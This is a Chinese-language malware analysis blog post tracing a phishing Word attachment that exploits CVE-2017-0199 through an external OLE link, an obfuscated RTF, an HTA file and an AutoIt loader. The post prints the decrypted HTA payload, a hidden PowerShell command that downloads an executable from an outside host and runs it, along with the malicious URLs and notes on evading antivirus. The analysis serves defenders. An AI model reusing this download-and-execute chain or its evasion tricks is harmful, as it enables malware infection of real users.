CVE 2017-0199漏洞利用的新姿勢

*

近日從客戶處捕獲一枚郵件附件中的可疑word樣本

，以下是掃描結果，檢測率貌似不高。

手動分析吧。

文件md5：0b16b255918264667a9f03e0b9f45167

1.攻擊流程的第一步

打開該word樣本沒有給任何提示該就直接聯網獲取文件：

windbg掛著找了半天，一直沒發現這個鏈接動作是怎麼觸發的。後來在發現 document.xml.rels裡面找到一個鏈接到外部的oleobject對象，指向地址https://klotshop.tech/images/maps/tisty.doc。

在document.xml里找到該oleobject的屬性。

           ![CVE 2017-0199漏洞利用的新姿勢](//image.3001.net/images/20171225/15141736033162.png!small)


通過這個oleobject ，office可以鏈接外部的office文檔，當然這個oleobject屬性也可以添加script monker ，soap monker標籤來觸發0199和8579等office漏洞， 目前也發現了用使用這樣的方法來攻擊的樣本一批樣本。

2.攻擊流程的第二步

Tisty.doc下載下來後發現是個rtf格式的文檔，Vt上一看，只有幾個廠商對這個文件檢測，也就是說如果用這個文件來做攻擊的話國內的殺軟都會漏過去？

文件頭如下：

Objaulink objupdate,標準的0199的線索，繼續往下找，：

Urlmonker 的標識符E0C9EA79F9BACE118C8200AA004BA90B，病毒作者加入了各種符號混淆，目的就是繞過網上公開的那些yara規則，繼續往下：

url的地址，為了繞過yara檢測，也是加入了各種符號隔開有意義的字元段，不過看起來效果很好，vt上對這個文檔的檢測確實很少。

url解出來後是https://klotshop.tech/images/maps/nin.hta，一個hta文件，由於0199漏洞的存在，該hta文件會被直接執行。

3.惡意攻擊流程的第三步：

nin.hta文件內容如下：

解密後如下：

Dim  adIM  bSET   a       =       CreateObject("WScript.Shell")      b       =       " pOWershELl.ExE -EX bYpASs -Nop -whIDDEn iNvOKE-WEbrEQuESt -uri "https://longstop.club/Smileys/kina/dlnd.php"-OUtfilE    "%APPdATa%kalat.exe" ; InvOKe-iTem "%appdATa%kalat.exe""        a.rUN       ""C:\Windows\system32\cmd.exe""/c"",   0       SET   a       =       nOtHINgself.CloSE

4.攻擊流程的第四步：

第三步中的hta文件主要功能就是用powershell去訪問https://longstop.club/Smileys/kina/dlnd.php並將返回的內容保存為%APPdATa%kalat.exe並執行。

該鏈接會302到另外一個地址。

https://fex.net/get/177440922804/108291971

然後又會繼續302到https://fs5.fex.net/get/177440922804/108291971/a4f874ea/fate.exe

https://fex.net/是一個類似網上雲盤的網站,可以讓用戶隨意上傳文件。

最後會下載到這個exe

5.攻擊流程的第五步：

fate.exe,會釋放一個autoit腳本載入器和一個加密的autoit腳本,以及一些其他的文件,並調用載入器載入該autoit腳本。

Autoit腳本載入器是乾淨的官方版本，不會被殺，而加密的腳本本身不是可執行格式，因此也不會被殺，也就是這個文件釋放出來的所有文件都不會被查殺，作者也是試圖通過這種手段來免殺，不過效果看起來不太好，vt信息顯示這個文件本身被大多數廠商檢測。

綜合上面的分析，第二步中的惡意文檔被查殺的概率很低，第一步中的文檔次之，而最後一步中的惡意軟體檢出率非常高，可以看到釣魚攻擊中使用各種帶變形後的nday的文檔而非exe來繞過殺軟的靜態檢測還是很奏效，當然最後這個真正實施惡意行為的pe免殺實在做的很差。

*本文作者：kczwa1，本文屬 FreeBuf 原創獎勵計劃，未經許可禁止轉載

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！